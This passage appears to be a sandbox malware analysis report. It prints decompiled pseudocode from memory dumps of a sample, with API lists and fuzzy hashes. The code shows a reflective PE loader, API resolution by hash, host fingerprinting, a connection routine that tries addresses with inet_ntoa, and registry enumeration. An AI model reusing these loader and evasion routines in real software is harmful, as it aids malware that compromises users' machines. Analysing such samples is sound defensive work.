    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: memcpy
    • String ID:
    • API String ID: 3510742995-0
    • Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction ID: 37f92e61c07597de5f8ff42a19195074019c2e6e8804826e0ef386d2b38f2b3c
    • Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction Fuzzy Hash: 6FD11475A007049FCB24CF6DD9D096AB7E5FF88304B28896DE88ACB701D731E954CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E03612AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v5;
    				signed short _v12;
    				intOrPtr* _v16;
    				signed int* _v20;
    				intOrPtr _v24;
    				unsigned int _v28;
    				signed short* _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr* _v40;
    				signed short* _v44;
    				intOrPtr _v48;
    				unsigned int _v52;
    				intOrPtr _v56;
    				_Unknown_base(*)()* _v60;
    				signed int _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				unsigned int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _t149;
    				void* _t189;
    				signed int _t194;
    				signed int _t196;
    				intOrPtr _t236;
    
    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_v24 = _v72;
    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
    				_v56 = _t236;
    				if(_t236 == 0) {
    					L13:
    					while(0 != 0) {
    					}
    					_push(8);
    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
    						L35:
    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
    						while(0 != 0) {
    						}
    						if(_a12 != 0) {
    							 *_a12 = _v68;
    						}
    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
    						return _v68(_a4, 1, _a8);
    					}
    					_v84 = 0x80000000;
    					_t149 = 8;
    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						if(_v36 == 0) {
    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						}
    						if(_v36 != 0) {
    							if( *_v16 == 0) {
    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
    							} else {
    								_v20 =  *_v16 + _a4;
    							}
    							_v64 = _v64 & 0x00000000;
    							while( *_v20 != 0) {
    								if(( *_v20 & _v84) == 0) {
    									_v88 =  *_v20 + _a4;
    									_v60 = GetProcAddress(_v36, _v88 + 2);
    								} else {
    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
    								}
    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
    									 *_v20 = _v60;
    								} else {
    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
    								}
    								_v20 =  &(_v20[1]);
    								_v64 = _v64 + 4;
    							}
    							_v16 = _v16 + 0x14;
    							continue;
    						} else {
    							_t189 = 0xfffffffd;
    							return _t189;
    						}
    					}
    					goto L35;
    				}
    				_t194 = 8;
    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
    				_t196 = 8;
    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
    				while(0 != 0) {
    				}
    				while(_v48 > 0) {
    					_v28 = _v44[2];
    					_v48 = _v48 - _v28;
    					_v28 = _v28 - 8;
    					_v28 = _v28 >> 1;
    					_v32 =  &(_v44[4]);
    					_v80 = _a4 +  *_v44;
    					_v52 = _v28;
    					while(1) {
    						_v76 = _v52;
    						_v52 = _v52 - 1;
    						if(_v76 == 0) {
    							break;
    						}
    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
    						_v12 =  *_v32 & 0xfff;
    						_v40 = (_v12 & 0x0000ffff) + _v80;
    						if((_v5 & 0x000000ff) != 3) {
    							if((_v5 & 0x000000ff) == 0xa) {
    								 *_v40 =  *_v40 + _v56;
    							}
    						} else {
    							 *_v40 =  *_v40 + _v56;
    						}
    						_v32 =  &(_v32[1]);
    					}
    					_v44 = _v32;
    				}
    				goto L13;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 03612C57
    • LoadLibraryA.KERNEL32(?), ref: 03612C70
    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 03612CCC
    • GetProcAddress.KERNEL32(00000000,?), ref: 03612CEB
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AddressProc$HandleLibraryLoadModule
    • String ID:
    • API String ID: 384173800-0
    • Opcode ID: 6a5aed4526f1b5888666eabd8df2894a9ba86a5fb38f31eff76aaafcb97096b0
    • Instruction ID: c1185644289bb930d7cdb48e571b7be18c812ccdd8d8964b4d09eb2cfd51b76f
    • Opcode Fuzzy Hash: 6a5aed4526f1b5888666eabd8df2894a9ba86a5fb38f31eff76aaafcb97096b0
    • Instruction Fuzzy Hash: F7A18B75E00209DFCB54CFA8C991AADBBF0FF09314F188859E915EB350D734AA91CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E03601C68(signed int __ecx, void* __eflags, void* __fp0) {
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				void* _t13;
    				intOrPtr _t15;
    				signed int _t16;
    				intOrPtr _t17;
    				signed int _t18;
    				char _t20;
    				intOrPtr _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr _t29;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				intOrPtr _t48;
    				void* _t51;
    				signed int _t61;
    				signed int _t64;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t61 = __ecx;
    				_t41 =  *0x361e6dc; // 0x35c
    				_t13 = E0360A4A5(_t41, 0);
    				while(_t13 < 0) {
    					E036097F2( &_v28);
    					_t43 =  *0x361e6e0; // 0x0
    					_t15 =  *0x361e6e4; // 0x0
    					_t41 = _t43 + 0xe10;
    					asm("adc eax, ebx");
    					__eflags = _t15 - _v24;
    					if(__eflags > 0) {
    						L9:
    						_t16 = 0xfffffffe;
    						L13:
    						return _t16;
    					}
    					if(__eflags < 0) {
    						L4:
    						_t17 =  *0x361e684; // 0x530f6c8
    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x361e6d0, 0);
    						__eflags = _t18;
    						if(_t18 == 0) {
    							break;
    						}
    						_t35 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
    						_t41 =  *0x361e6dc; // 0x35c
    						__eflags = 0;
    						_t13 = E0360A4A5(_t41, 0);
    						continue;
    					}
    					__eflags = _t41 - _v28;
    					if(_t41 >= _v28) {
    						goto L9;
    					}
    					goto L4;
    				}
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t20 =  *0x361e6e8; // 0x530fc78
    				_v28 = _t20;
    				_t22 = E0360A68F(_t41, _t61,  &_v16);
    				_v20 = _t22;
    				if(_t22 != 0) {
    					_t23 = GetCurrentProcess();
    					_t24 = GetCurrentThread();
    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x361e6d0, 0, 0, 2);
    					E036097F2(0x361e6e0);
    					_t64 = E03601A1B( &_v28, E03601226, _t71);
    					__eflags = _t64;
    					if(_t64 >= 0) {
    						_push(0);
    						_push( *0x361e760);
    						_t51 = 0x27;
    						E03609EEC(_t51);
    					}
    				} else {
    					_t64 = _t61 | 0xffffffff;
    				}
    				_t29 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t29 + 0x30))( *0x361e6d0);
    				_t48 =  *0x361e6dc; // 0x35c
    				 *0x361e6d0 = 0;
    				E0360A4C1(_t48);
    				E03608600( &_v24, 0);
    				_t16 = _t64;
    				goto L13;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a26aa97f49520d4441224e81201f46038d44ad10ff4861d13c02136b149b062e
    • Instruction ID: 873af384aa20974af6a5a820a11506bf4177476567427300a4f007f4affe769f
    • Opcode Fuzzy Hash: a26aa97f49520d4441224e81201f46038d44ad10ff4861d13c02136b149b062e
    • Instruction Fuzzy Hash: BB31A43A614304AFD308FF68EC96C2B77A9FB45350B58092FF951D71D9DB21DC108696
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E03601B2D(void* __eflags, void* __fp0) {
    				char _v24;
    				char _v28;
    				void* _t12;
    				intOrPtr _t14;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				char _t24;
    				intOrPtr _t26;
    				intOrPtr _t28;
    				intOrPtr _t33;
    				intOrPtr _t38;
    				intOrPtr _t40;
    				void* _t41;
    				intOrPtr _t46;
    				void* _t48;
    				intOrPtr _t51;
    				void* _t61;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t38 =  *0x361e6f4; // 0x3ac
    				_t12 = E0360A4A5(_t38, 0);
    				while(_t12 < 0) {
    					E036097F2( &_v28);
    					_t40 =  *0x361e700; // 0x0
    					_t14 =  *0x361e704; // 0x0
    					_t41 = _t40 + 0x3840;
    					asm("adc eax, ebx");
    					__eflags = _t14 - _v24;
    					if(__eflags > 0) {
    						L13:
    						_t15 = 0;
    					} else {
    						if(__eflags < 0) {
    							L4:
    							_t16 =  *0x361e684; // 0x530f6c8
    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x361e6ec, 0);
    							__eflags = _t17;
    							if(_t17 == 0) {
    								break;
    							} else {
    								_t33 =  *0x361e684; // 0x530f6c8
    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
    								_t51 =  *0x361e6f4; // 0x3ac
    								__eflags = 0;
    								_t12 = E0360A4A5(_t51, 0);
    								continue;
    							}
    						} else {
    							__eflags = _t41 - _v28;
    							if(_t41 >= _v28) {
    								goto L13;
    							} else {
    								goto L4;
    							}
    						}
    					}
    					L12:
    					return _t15;
    				}
    				E036097F2(0x361e700);
    				_t19 = GetCurrentProcess();
    				_t20 = GetCurrentThread();
    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x361e6ec, 0, 0, 2);
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 =  *0x361e6e8; // 0x530fc78
    				_v28 = _t24;
    				_t61 = E03601A1B( &_v28, E0360131E, _t71);
    				if(_t61 >= 0) {
    					_push(0);
    					_push( *0x361e760);
    					_t48 = 0x27;
    					E03609EEC(_t48);
    				}
    				if(_v24 != 0) {
    					E03606876( &_v24);
    				}
    				_t26 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t26 + 0x30))( *0x361e6ec);
    				_t28 =  *0x361e758; // 0x0
    				 *0x361e6ec = 0;
    				_t29 =  !=  ? 1 : _t28;
    				_t46 =  *0x361e6f4; // 0x3ac
    				 *0x361e758 =  !=  ? 1 : _t28;
    				E0360A4C1(_t46);
    				_t15 = _t61;
    				goto L12;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(0361E6EC,00000000,00000000,00000002), ref: 03601BCC
    • GetCurrentThread.KERNEL32 ref: 03601BCF
    • GetCurrentProcess.KERNEL32(00000000), ref: 03601BD6
    • DuplicateHandle.KERNEL32(00000000), ref: 03601BD9
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Current$Process$DuplicateHandleThread
    • String ID:
    • API String ID: 3566409357-0
    • Opcode ID: cf727b062261d718c954dc6d0ea3d8263b47cfe1c49f8128d718b15b859b394c
    • Instruction ID: 4924f5d2a83c4570645c6849a850e077ef041d7b50a8b26afa680d53ff9c7144
    • Opcode Fuzzy Hash: cf727b062261d718c954dc6d0ea3d8263b47cfe1c49f8128d718b15b859b394c
    • Instruction Fuzzy Hash: 8D31B03A6043019FE30CFF64E89A92B77A9EB45350B48182EF901872DDDB32DC14CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E03601A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				CHAR* _v20;
    				char _v36;
    				signed short _t22;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t32;
    				intOrPtr _t37;
    				CHAR* _t38;
    				CHAR* _t39;
    				intOrPtr _t40;
    				intOrPtr _t54;
    				char* _t57;
    				signed int _t60;
    				signed int _t61;
    				signed int _t64;
    				CHAR* _t66;
    				void* _t74;
    
    				_t74 = __fp0;
    				_t40 = __ecx;
    				_t37 = __edx;
    				_v12 = __ecx;
    				_t57 =  *0x361e6f0; // 0x52e4f30
    				_push(_t60);
    				_t61 = _t60 | 0xffffffff;
    				_v16 = __edx;
    				_t66 = _t61;
    				if( *_t57 != 0) {
    					L6:
    					_t22 =  *0x361e6fc; // 0x0
    					_t72 = _t22;
    					if(_t22 == 0) {
    						goto L9;
    					} else {
    						_t24 = E0360160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
    						_t66 = _t24;
    						if(_t66 < 0) {
    							goto L9;
    						} else {
    						}
    					}
    				} else {
    					_push(0x2d);
    					_t39 = E03609E8B();
    					_v20 = _t39;
    					_t32 = E03609E4C(0x2e);
    					_v8 = _t32;
    					if(_t39 != 0 && _t32 != _t61) {
    						_t54 =  *0x361e6f0; // 0x52e4f30
    						E036096B0(_t54, _t39, 0x100);
    						 *0x361e6fc = _v8;
    					}
    					E03608600( &_v20, _t61);
    					_t57 =  *0x361e6f0; // 0x52e4f30
    					if( *_t57 == 0) {
    						L9:
    						_t38 = 0;
    						_v8 = 0;
    						_t23 = E03601778( &_v8, _t74);
    						_v20 = _t23;
    						__eflags = _t23;
    						if(_t23 != 0) {
    							__eflags = _v8;
    							if(_v8 > 0) {
    								_t13 =  &(_t23[4]); // 0x4
    								_t64 = _t13;
    								while(1) {
    									__eflags =  *_t64;
    									if(__eflags != 0) {
    										__imp__#12(0x10);
    										lstrcpynA( &_v36, _t23,  *_t64);
    										_t23 = E0360160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
    										_t66 = _t23;
    									}
    									__eflags = _t66;
    									if(_t66 >= 0) {
    										break;
    									}
    									_t38 = _t38 + 1;
    									_t64 = _t64 + 0x20;
    									__eflags = _t38 - _v8;
    									if(_t38 < _v8) {
    										continue;
    									}
    									break;
    								}
    								_t61 = _t64 | 0xffffffff;
    								__eflags = _t61;
    							}
    							E03608600( &_v20, _v8);
    						}
    						__eflags = _t66;
    						_t62 =  >=  ? _t66 : _t61;
    						_t24 =  >=  ? _t66 : _t61;
    					} else {
    						_t37 = _v16;
    						_t40 = _v12;
    						goto L6;
    					}
    				}
    				return _t24;
    			}

    APIs
    • inet_ntoa.WS2_32(00000004), ref: 03601ADB
    • lstrcpynA.KERNEL32(?,00000000), ref: 03601AE6
      • Part of subcall function 036096B0: memset.MSVCRT ref: 036096D9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: inet_ntoalstrcpynmemset
    • String ID: @}s
    • API String ID: 129148211-1738643329
    • Opcode ID: c12d169a9ccb2748af3ccc0eae50abd05b8eff2bbeb4dfc568fe2d0365266abc
    • Instruction ID: 6fae37f642fb32a08a25d729f3896f86ac5300fd283a50044fdf6d56966bca23
    • Opcode Fuzzy Hash: c12d169a9ccb2748af3ccc0eae50abd05b8eff2bbeb4dfc568fe2d0365266abc
    • Instruction Fuzzy Hash: 2431FB3AE0031AABDB19DFE4D881AAFB7B5EB45310F18025FD510A73C4EB749940CB94
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 100%
    			E00E5DFB8(void* __ecx, intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v92;
    				intOrPtr _t41;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				void* _t56;
    				struct HINSTANCE__* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t60;
    				void* _t62;
    				intOrPtr _t63;
    				void* _t69;
    				char _t70;
    				void* _t75;
    				CHAR* _t80;
    				void* _t82;
    
    				_t75 = __ecx;
    				_v12 = __edx;
    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
    				if(_t41 == 0) {
    					L4:
    					return 0;
    				}
    				_t62 = _t41 + __ecx;
    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
    				_t47 = 0;
    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_v8 = 0;
    				_v16 = _t63;
    				if(_t63 == 0) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t49 = E00E5D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E00E5C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
    					_t18 =  &_v8; // 0xe5604a
    					_t51 =  *_t18;
    					if((_t49 ^ 0x218fe95b) == _v12) {
    						break;
    					}
    					_t73 = _v20;
    					_t47 = _t51 + 1;
    					_v8 = _t47;
    					if(_t47 < _v16) {
    						continue;
    					}
    					goto L4;
    				}
    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
    					return _t80;
    				} else {
    					_t56 = 0;
    					while(1) {
    						_t70 = _t80[_t56];
    						if(_t70 == 0x2e || _t70 == 0) {
    							break;
    						}
    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
    						_t56 = _t56 + 1;
    						if(_t56 < 0x40) {
    							continue;
    						}
    						break;
    					}
    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
    					if( *((char*)(_t56 + _t80)) != 0) {
    						_t80 =  &(( &(_t80[1]))[_t56]);
    					}
    					_t40 =  &_v92; // 0x6c6c642e
    					_t58 = LoadLibraryA(_t40); // executed
    					if(_t58 == 0) {
    						goto L4;
    					}
    					_t59 = GetProcAddress(_t58, _t80);
    					if(_t59 == 0) {
    						goto L4;
    					}
    					return _t59;
    				}
    			}

    APIs
    • LoadLibraryA.KERNELBASE(.dll,J`,0000011C,00000000), ref: 00E5E088
    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 00E5E094
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .dll$J`$J`
    • API String ID: 2574300362-3045228671
    • Opcode ID: 82590b97f2fd15dba4018f9c0659b2e42b5f1b604fc5b382d9640a7c7b10ffe5
    • Instruction ID: 47be2b8d59d00d8daa90158b28c7766eb7386172c6ee341c95e0d23724519f48
    • Opcode Fuzzy Hash: 82590b97f2fd15dba4018f9c0659b2e42b5f1b604fc5b382d9640a7c7b10ffe5
    • Instruction Fuzzy Hash: AE319431A001599BCB28CF6DD8807AEBBE5AF44306F285869DC45F7391D7B0EE49C790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00E5CF8F(void* __ecx) {
    				intOrPtr _t11;
    				long _t12;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				struct _OSVERSIONINFOA* _t29;
    
    				_push(__ecx);
    				_t29 =  *0xe6e688; // 0xe80000
    				GetCurrentProcess();
    				_t11 = E00E5B9EB(); // executed
    				_t1 = _t29 + 0x1644; // 0xe81644
    				_t25 = _t1;
    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
    				_t33 = _t12;
    				if(_t12 != 0) {
    					_t12 = E00E58FA4(_t25, _t33);
    				}
    				_t3 = _t29 + 0x228; // 0xe80228
    				 *(_t29 + 0x1854) = _t12;
    				 *((intOrPtr*)(_t29 + 0x434)) = E00E58FA4(_t3, _t33);
    				memset(_t29, 0, 0x9c);
    				_t29->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t29);
    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
    				_t17 = E00E5E3C1(_t3);
    				_t7 = _t29 + 0x220; // 0xe80220
    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
    				_t18 = E00E5E3FC(_t7); // executed
    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
    				return _t18;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,?,00E80000,?,00E5353A), ref: 00E5CF9B
    • GetModuleFileNameW.KERNEL32(00000000,00E81644,00000105,?,?,00E80000,?,00E5353A), ref: 00E5CFBC
    • memset.MSVCRT ref: 00E5CFED
    • GetVersionExA.KERNEL32(00E80000,00E80000,?,00E5353A), ref: 00E5CFF8
    • GetCurrentProcessId.KERNEL32(?,00E5353A), ref: 00E5CFFE
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CurrentProcess$FileModuleNameVersionmemset
    • String ID:
    • API String ID: 3581039275-0
    • Opcode ID: 6f9e4a160f5193cef5f8becbca3ee34e6ac2211230e728561dc3fb0e40881a05
    • Instruction ID: 47846cdc39875daa40a14a87640607f2d79a32848243e08e4835e2558ff94615
    • Opcode Fuzzy Hash: 6f9e4a160f5193cef5f8becbca3ee34e6ac2211230e728561dc3fb0e40881a05
    • Instruction Fuzzy Hash: 38019E70A017009FE720AF71AD0ABDB7BE5EF94351F000C2DF956A3250EFB46509CA50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00E624A6(signed int __eax, intOrPtr _a4) {
    				intOrPtr* _v8;
    				signed int* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				struct HINSTANCE__* _v48;
    				intOrPtr _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				signed int _v64;
    				signed int _t109;
    				signed int _t112;
    				signed int _t115;
    				struct HINSTANCE__* _t121;
    				void* _t163;
    
    				_v44 = _v44 & 0x00000000;
    				if(_a4 != 0) {
    					_v48 = GetModuleHandleA("kernel32.dll");
    					_v40 = E00E5E0A4(_v48, "GetProcAddress");
    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    					_v32 = _v52;
    					_t109 = 8;
    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
    						L24:
    						return 0;
    					}
    					_v56 = 0x80000000;
    					_t112 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v8 = _v8 + 0x14;
    					}
    					_t115 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
    						_v36 = _t121;
    						if(_v36 != 0) {
    							if( *_v8 == 0) {
    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
    							} else {
    								_v12 =  *_v8 + _a4;
    							}
    							_v28 = _v28 & 0x00000000;
    							while( *_v12 != 0) {
    								_v24 = _v24 & 0x00000000;
    								_v16 = _v16 & 0x00000000;
    								_v64 = _v64 & 0x00000000;
    								_v20 = _v20 & 0x00000000;
    								if(( *_v12 & _v56) == 0) {
    									_v60 =  *_v12 + _a4;
    									_v20 = _v60 + 2;
    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
    									_v16 = _v40(_v36, _v20);
    								} else {
    									_v24 =  *_v12;
    									_v20 = _v24 & 0x0000ffff;
    									_v16 = _v40(_v36, _v20);
    								}
    								if(_v24 != _v16) {
    									_v44 = _v44 + 1;
    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
    										 *_v12 = _v16;
    									} else {
    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
    									}
    								}
    								_v12 =  &(_v12[1]);
    								_v28 = _v28 + 4;
    							}
    							_v8 = _v8 + 0x14;
    							continue;
    						}
    						_t163 = 0xfffffffd;
    						return _t163;
    					}
    					goto L24;
    				}
    				return __eax | 0xffffffff;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00E624C3
    • LoadLibraryA.KERNELBASE(00000000), ref: 00E6255C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID: GetProcAddress$kernel32.dll
    • API String ID: 4133054770-1584408056
    • Opcode ID: 9abdf5bb9ef2270c871a12cb04801ad69a76d237452fc4ee3758340f650b57af
    • Instruction ID: 7d618a1dcfadd11b6e7c6262d145a8f39e3499470f1018a4630161e030597057
    • Opcode Fuzzy Hash: 9abdf5bb9ef2270c871a12cb04801ad69a76d237452fc4ee3758340f650b57af
    • Instruction Fuzzy Hash: DB61BD75D40608EFDB00CF98D585BADBBB1BF08369F208599E911BB2A1C374AA80DF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00E5619A(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				char _v24;
    				char _v28;
    				void* _v32;
    				void* _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v56;
    				void _v576;
    				void* _t53;
    				intOrPtr _t63;
    				intOrPtr _t72;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				intOrPtr _t82;
    				signed int _t85;
    				intOrPtr _t87;
    				int _t89;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t108;
    
    				_t108 = __fp0;
    				_t96 = __edx;
    				_t89 = 0;
    				_v8 = 0;
    				memset( &_v576, 0, 0x208);
    				_v28 = 0x104;
    				_v20 = 0x3fff;
    				_v16 = 0;
    				_t53 = E00E585EA(0x3fff); // executed
    				_t98 = _t53;
    				_t100 = _t99 + 0x10;
    				_v32 = _t98;
    				if(_t98 == 0) {
    					L18:
    					return 0;
    				}
    				_t97 = E00E585EA(0x800);
    				_v36 = _t97;
    				if(_t97 == 0) {
    					goto L18;
    				}
    				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
    					L15:
    					if(_v8 != 0) {
    						_t63 =  *0xe6e68c; // 0x510f890
    						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
    					}
    					E00E58600( &_v32, 0x3fff); // executed
    					E00E58600( &_v36, 0x800); // executed
    					goto L18;
    				}
    				_push( &_v56);
    				_push( &_v40);
    				_push( &_v44);
    				_push( &_v48);
    				_push( &_v24);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push( &_v28);
    				_push( &_v576);
    				_t72 =  *0xe6e68c; // 0x510f890
    				_push(_v8);
    				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
    					__eflags = _v24;
    					if(_v24 == 0) {
    						goto L15;
    					}
    					_v12 = 0;
    					do {
    						memset(_t97, 0, 0x800);
    						memset(_t98, 0, 0x3fff);
    						_t100 = _t100 + 0x18;
    						_v20 = 0x3fff;
    						_v16 = 0x800;
    						 *_t98 = 0;
    						_t80 =  *0xe6e68c; // 0x510f890
    						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
    						__eflags = _t81;
    						if(_t81 == 0) {
    							_t82 =  *0xe6e690; // 0x510f968
    							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
    							__eflags = _t90;
    							if(_t90 != 0) {
    								_t92 =  *0xe6e68c; // 0x510f890
    								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
    								__eflags = _a16;
    								if(_a16 != 0) {
    									_t85 = E00E5C39D(_t90);
    									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
    									if(__eflags == 0) {
    										__eflags = 0;
    										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
    									}
    									E00E5B197(_t90, _t96, __eflags, _t108);
    								}
    							}
    							_t89 = _v12;
    						}
    						_t89 = _t89 + 1;
    						_v12 = _t89;
